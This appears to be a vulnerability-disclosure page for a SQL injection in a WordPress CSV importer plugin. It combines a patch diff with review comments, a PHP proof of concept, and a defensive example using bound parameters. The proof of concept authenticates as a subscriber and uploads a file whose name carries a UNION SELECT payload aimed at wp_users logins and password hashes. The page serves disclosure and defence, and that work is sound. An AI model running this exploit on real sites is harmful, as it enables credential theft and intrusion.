+			if (!isset($data[$line_number]) || !is_array($data[$line_number])) {
 				return null;
 			}
 		}

 		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/imports/import_logs/' . $hash_key . '/';
-
+
 		if (!is_dir($upload_dir)) {
 			if (!wp_mkdir_p($upload_dir)) {
 				return null;
 			}
 		}
-
+
 		chmod($upload_dir, 0777);
-
+
 		$index_file = $upload_dir . 'index.php';
 		if (!file_exists($index_file)) {
 			$index_content = '<?php' . PHP_EOL . '?>';
 			file_put_contents($index_file, $index_content);
 			chmod($index_file, 0644);
 		}
-
+
 		$baseFileName = 'summary_log';
 		$export_type = 'csv';
 		$filePath = $upload_dir . $baseFileName . '.' . $export_type;
 		$fileURL = network_home_url() . '/wp-content/uploads/smack_uci_uploads/imports/import_logs/' . $hash_key . '/' . $baseFileName . '.' . $export_type;
-
+
 		$headers = array_keys($data[$line_number]);
-
-
+
+
 		// Read existing CSV file and store lines
 		$lines = [];
 		if (file_exists($filePath)) {
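Review bot: in `manage_records()`, the format array passed to `$wpdb->insert()` does not line up with the column array: there are 18 columns but 16 formats, and the eighth format, `%d`, falls on `registered_on`, which receives the date string `$imported_on`. Align the formats one-to-one with the columns. In the same function, `$get_data[0]->skipped` is read without checking that the prepared `hash_key` lookup returned a row. The security-relevant changes in this hunk are the added `sanitize_file_name($file_name)` and the three queries converted to `$wpdb->prepare()`; committing them separately from the re-indentation of `download_failed_log()` would make the fix far easier to audit.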
@@ -877,7 +878,7 @@
 			// If file does not exist, create header row
 			$lines[] = $headers;
 		}
-
+
 		// Update the specific line numbers
 		foreach ($data as $index => $row) {
 			$new_line = [];
@@ -886,10 +887,10 @@
 			}
 			$lines[$line_number + $index - 1] = $new_line;
 		}
-
+
 		// Write back the updated lines to the CSV file
 		$file = fopen($filePath, 'w');
-		if($file){
+		if ($file) {
 			foreach ($lines as $line) {
 				fputcsv($file, $line);
 			}
@@ -898,32 +899,33 @@
 		chmod($filePath, 0644);
 		return isset($fileURL) ? $fileURL : null;
 	}
-
+
 	/**
 	 * Starts the failed media download
 	 */
-	public function failedMediaExport($data, $line_number, $hash_key) {
+	public function failedMediaExport($data, $line_number, $hash_key)
+	{
 		$baseFileName = 'failed_media_log';
 		$export_type = 'csv';
 		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/imports/failed_media_logs/' . $hash_key . '/';
 		$file_path = $upload_dir . $baseFileName . '.' . $export_type;
 		$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/imports/failed_media_logs/' . $hash_key . '/' . $baseFileName . '.' . $export_type;
 		$headers = ['post_id', 'title', 'media_id', 'actual_url'];
-
+
 		if (empty($data)) {
 			if (!is_dir($upload_dir) && !wp_mkdir_p($upload_dir)) {
 				return null;
 			}
-
+
 			if (!file_exists($file_path) || !is_readable($file_path)) {
 				return null;
 			}
-
+
 			$file_handle = fopen($file_path, 'r');
 			if ($file_handle === false) {
 				return null;
 			}
-
+
 			$data_found = false;
 			while (($row = fgetcsv($file_handle)) !== false) {
 				if (!empty(array_filter($row))) {
@@ -932,22 +934,22 @@
 				}
 			}
 			fclose($file_handle);
-
+
 			return $data_found ? $file_url : null;
 		}
-
+
 		if (!is_dir($upload_dir) && !wp_mkdir_p($upload_dir)) {
 			return null;
 		}
-
+
 		chmod($upload_dir, 0777);
-
+
 		$index_file = $upload_dir . 'index.php';
 		if (!file_exists($index_file)) {
 			file_put_contents($index_file, "<?phpn?>");
 			chmod($index_file, 0644);
 		}
-
+
 		$lines = [];
 		if (file_exists($file_path)) {
 			$file = fopen($file_path, 'r');
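Review bot: the `index.php` placeholder written in `failedMediaExport()` is the literal string `"<?phpn?>"`, whereas the other exporters in this file build it as `'<?php' . PHP_EOL . '?>'`. As shown, the file does not start with a valid `<?php` open tag followed by whitespace, so it is not the empty PHP script the other directories get. Use the same `PHP_EOL` construction here.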
@@ -958,7 +960,7 @@
 		} else {
 			$lines[] = $headers;
 		}
-
+
 		foreach ($data as $index => $row) {
 			$new_line = [];
 			foreach ($headers as $header) {
@@ -966,54 +968,55 @@
 			}
 			$lines[$line_number + $index - 1] = $new_line;
 		}
-
+
 		$file = fopen($file_path, 'w');
 		foreach ($lines as $line) {
 			fputcsv($file, $line);
 		}
 		fclose($file);
-
+
 		chmod($file_path, 0644);
-
+
 		return $file_url;
 	}
-
+
 	/**
 	 * Starts the media download
 	 */
-	public function mediaExport($data,$line_number,$hash_key){
+	public function mediaExport($data, $line_number, $hash_key)
+	{
 		if (empty($data)) {
 			return null; // Exit function if data is empty
 		}
-		if(!isset($data[$line_number]) || !is_array($data[$line_number])){
+		if (!isset($data[$line_number]) || !is_array($data[$line_number])) {
 			$line_number = $line_number - 1;
-			if(!isset($data[$line_number]) || !is_array($data[$line_number])){
+			if (!isset($data[$line_number]) || !is_array($data[$line_number])) {
 				return null;
 			}
 		}
 		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/imports/media_logs/' . $hash_key . '/';
-
+
 		if (!is_dir($upload_dir)) {
 			if (!wp_mkdir_p($upload_dir)) {
 				return null;
 			}
 		}
-
+
 		chmod($upload_dir, 0777);
-
+
 		$index_file = $upload_dir . 'index.php';
 		if (!file_exists($index_file)) {
 			$index_content = '<?php' . PHP_EOL . '?>';
 			file_put_contents($index_file, $index_content);
 			chmod($index_file, 0644);
 		}
-
+
 		$baseFileName = 'media_log';
 		$export_type = 'csv';
 		$filePath = $upload_dir . $baseFileName . '.' . $export_type;
 		$fileURL = network_home_url() . '/wp-content/uploads/smack_uci_uploads/imports/media_logs/' . $hash_key . '/' . $baseFileName . '.' . $export_type;
 		$headers = array_keys($data[$line_number]);
-
+
 		// Read existing CSV file and store lines
 		$lines = [];
 		if (file_exists($filePath)) {
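Review bot: in `failedMediaExport()`, `$file = fopen($file_path, 'w');` is followed directly by `fputcsv($file, $line)` and `fclose($file)` with no check on the handle, while this patch's `Insert_log_details()` wraps the same loop in `if ($file) {`. Apply the same guard here and return `null` on failure, so an unwritable log directory does not produce warnings and a `$file_url` for a file that was never written.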
@@ -1026,7 +1029,7 @@
 			// If file does not exist, create header row
 			$lines[] = $headers;
 		}
-
+
 		// Update the specific line numbers
 		foreach ($data as $index => $row) {
 			$new_line = [];
@@ -1035,14 +1038,14 @@
 			}
 			$lines[$line_number + $index - 1] = $new_line;
 		}
-
+
 		// Write back the updated lines to the CSV file
 		$file = fopen($filePath, 'w');
 		foreach ($lines as $line) {
 			fputcsv($file, $line);
 		}
 		fclose($file);
-
+
 		chmod($filePath, 0644);
 		return isset($fileURL) ? $fileURL : null;
 	}
--- a/wp-ultimate-csv-importer/uploadModules/UrlUpload.php
+++ b/wp-ultimate-csv-importer/uploadModules/UrlUpload.php
@@ -6,32 +6,35 @@
  */

 namespace SmackcodersFCSV;
- require_once(__DIR__.'/../vendor/autoload.php');
+require_once(__DIR__ . '/../vendor/autoload.php');

 use Lea

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1317 - WP Import – Ultimate CSV XML Importer for WordPress <= 7.37 - Authenticated (Subscriber+) SQL Injection via File Name

<?php
/**
 * DISCLAIMER: For authorized security testing only. Do not use against systems you do not own or have permission to test.
 * This PoC demonstrates the SQL injection vulnerability via malicious filename.
 * Requirements: Subscriber+ account, 'Single Import/Export' feature enabled, PHP < 8.0
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_1317_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code !== 200 || strpos($response, 'Dashboard') === false) {
    die("Authentication failed. Check credentials.");
}

// Step 2: Extract nonce from plugin page (required for AJAX requests)
$plugin_page_url = $target_url . '/wp-admin/admin.php?page=wp-ultimate-csv-importer';
curl_setopt_array($ch, [
    CURLOPT_URL => $plugin_page_url,
    CURLOPT_POST => false,
    CURLOPT_POSTFIELDS => null
]);

$response = curl_exec($ch);

// Extract nonce from page (simplified - actual implementation would need proper regex)
$nonce = '';
if (preg_match('/"securekey"\s*value="([^"]+)"/', $response, $matches)) {
    $nonce = $matches[1];
}

if (empty($nonce)) {
    die("Could not extract nonce. Plugin may not be active or accessible.");
}

// Step 3: Upload file with malicious filename containing SQL injection payload
// The filename will be stored in the database and later used in vulnerable SQL queries
$upload_url = $target_url . '/wp-admin/admin-ajax.php';
$malicious_filename = "test_file' UNION SELECT user_login,user_pass,1,2 FROM wp_users WHERE '1'='1.csv";

// Create a temporary CSV file for upload
$temp_csv = tempnam(sys_get_temp_dir(), 'malicious_');
file_put_contents($temp_csv, "id,name\n1,test");

$post_fields = [
    'action' => 'smack_uci_upload_file',
    'securekey' => $nonce,
    'file' => new CURLFile($temp_csv, 'text/csv', $malicious_filename),
    'upload_type' => 'single' // Requires Single Import/Export feature enabled
];

curl_setopt_array($ch, [
    CURLOPT_URL => $upload_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_fields,
    CURLOPT_HTTPHEADER => ['Expect:'] // Remove Expect header for large posts
]);

$response = curl_exec($ch);
$upload_result = json_decode($response, true);

if (json_last_error() !== JSON_ERROR_NONE || !isset($upload_result['success'])) {
    echo "File upload may have failed. Response: " . htmlspecialchars($response) . "\n";
}

// Step 4: Trigger import process which will use the malicious filename in SQL queries
// The plugin will retrieve the filename from database and use it in vulnerable queries
$trigger_url = $target_url . '/wp-admin/admin-ajax.php';
$trigger_data = [
    'action' => 'smack_uci_import_data',
    'securekey' => $nonce,
    'hash_key' => $upload_result['hash_key'] ?? 'extracted_from_previous_step',
    'selected_type' => 'Posts',
    'import_mode' => 'Insert'
];

curl_setopt_array($ch, [
    CURLOPT_URL => $trigger_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $trigger_data
]);

$response = curl_exec($ch);

// The SQL injection would execute during the import process
// In a real exploit, the attacker would extract the query results via error messages or timing attacks

echo "Exploit attempt completed. Check database logs for SQL injection evidence.\n";

// Cleanup
curl_close($ch);
unlink($cookie_file);
unlink($temp_csv);
?>
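The PoC above only works if a stored file name is later pasted into SQL text. The following stand-alone script is an added example (not the plugin's or Atomic Edge's code) that contrasts that pattern with a bound parameter and an upload-time allowlist; in WordPress the bound form corresponds to `$wpdb->prepare()` with a `%s` placeholder. Assumptions: SQLite through PDO (`pdo_sqlite`) stands in for MySQL, and the `file_uploads` table, its columns, the allowlist and the first two sample names are constructed for the demo.

```php
<?php
// Added example. SQLite in memory stands in for the plugin's MySQL table;
// the table name, column names and allowlist are constructed for this demo.

// Allowlist: letters, digits, space, dot, dash, underscore, known extension.
const SAFE_NAME = '/\A[A-Za-z0-9][A-Za-z0-9 ._-]{0,200}\.(csv|xml|txt|zip)\z/';

function is_safe_upload_name(string $name): bool
{
    return preg_match(SAFE_NAME, $name) === 1;
}

// Unsafe pattern: the stored name becomes part of the SQL text.
function lookup_interpolated(PDO $db, string $name): string
{
    try {
        $sql = "SELECT hash_key FROM file_uploads WHERE file_name = '$name'";
        return 'rows: ' . json_encode($db->query($sql)->fetchAll(PDO::FETCH_COLUMN));
    } catch (PDOException $e) {
        return 'parsed as SQL -> ' . $e->getMessage();
    }
}

// Hardened pattern: the stored name is sent as a bound parameter.
function lookup_bound(PDO $db, string $name): string
{
    $stmt = $db->prepare('SELECT hash_key FROM file_uploads WHERE file_name = ?');
    $stmt->execute([$name]);
    return 'rows: ' . json_encode($stmt->fetchAll(PDO::FETCH_COLUMN));
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE file_uploads (file_name TEXT, hash_key TEXT)');

$names = [
    'products-2026.csv',   // constructed: ordinary name
    "o'brien-orders.csv",  // constructed: legitimate apostrophe
    "test_file' UNION SELECT user_login,user_pass,1,2 FROM wp_users WHERE '1'='1.csv", // name used by the PoC on this page
];
$insert = $db->prepare('INSERT INTO file_uploads (file_name, hash_key) VALUES (?, ?)');
foreach ($names as $i => $name) {
    $insert->execute([$name, "hash-$i"]); // stored as-is to show the lookup side
    printf("%s\n  gate:         %s\n  interpolated: %s\n  bound:        %s\n",
        $name,
        is_safe_upload_name($name) ? 'accept' : 'reject',
        lookup_interpolated($db, $name),
        lookup_bound($db, $name));
}
```

For the two names containing a quote, the interpolated lookup ends in a database error because the name is parsed as SQL, while the bound lookup returns the row that was stored under that exact name.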
